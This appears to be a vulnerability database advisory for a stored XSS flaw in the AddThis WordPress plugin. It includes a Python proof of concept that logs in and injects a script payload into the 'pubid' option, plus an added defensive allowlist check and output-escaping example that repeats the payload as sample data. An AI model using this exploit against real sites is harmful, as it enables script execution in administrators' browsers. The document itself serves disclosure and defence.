Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

2015-06-10T00:00:00
ID WPEX-ID:8038
Type wpexploit
Reporter James Hooker
Modified 2019-10-21T00:00:00

Description

WordPress Vulnerability - Smart Website Tools by AddThis 4.0.6-5.0.2 - Stored XSS

                                        
When executed, the following PoC overwrites the ‘pubid’ option with a malicious payload, which allows arbitrary JavaScript to execute when a user visits the plugin's options page (wp-admin/options-general.php?page=addthis_social_widget).

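import requests

# One session so the login cookies are reused for the second request.
s = requests.session()
target = 'http://localhost'

# Step 1: log in to WordPress with the test account.
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Step 2: call the plugin's AJAX action, which stores 'pubid' as sent.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "at_async_loading",
    "async_loading": 1,
    "pubid": "'><script>alert(1)</script '"
}
r = s.post(url, data=payload)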
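
For defenders, the following added example (not part of the original advisory and not the plugin's own code) flags form-encoded admin-ajax.php request bodies that set 'pubid' through the at_async_loading action to a value outside an allowlist, and shows the same value rendered inert by escaping on output. The allowlist pattern, the function names, the single-quoted attribute in the rendering and the sample bodies are assumptions made for illustration.

```python
import html
import re
from urllib.parse import parse_qs

# Assumption: a legitimate profile ID uses only letters, digits, '-' and '_'.
PUBID_ALLOWED = re.compile(r"[A-Za-z0-9_-]{1,64}")
AJAX_ACTION = "at_async_loading"  # action name taken from the PoC on this page


def inspect_ajax_body(body: str) -> list:
    """Return findings for one form-encoded POST body sent to admin-ajax.php."""
    fields = parse_qs(body, keep_blank_values=True)
    if AJAX_ACTION not in fields.get("action", []):
        return []  # a different AJAX action; out of scope for this check
    findings = []
    for value in fields.get("pubid", []):
        if not PUBID_ALLOWED.fullmatch(value):
            findings.append(f"pubid outside allowlist: {value!r}")
    return findings


def render_pubid_field(stored: str) -> str:
    """Render a stored pubid into a single-quoted attribute with escaping."""
    # quote=True also escapes ' and ", so the value cannot close the attribute.
    return "<input type='text' name='pubid' value='%s'>" % html.escape(stored, quote=True)


# Constructed sample bodies (not captured traffic).
SAMPLE_BODIES = [
    "action=at_async_loading&async_loading=1&pubid=ra-0123456789abcdef",
    "action=at_async_loading&async_loading=1"
    "&pubid=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript+%27",
    "action=heartbeat&pubid=%3Cb%3E",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(inspect_ajax_body(body) or "clean", "<-", body)
    print(render_pubid_field("'><script>alert(1)</script '"))
```

The same allowlist can be applied when the option is saved, with the escaping applied wherever the stored value is written into the options page.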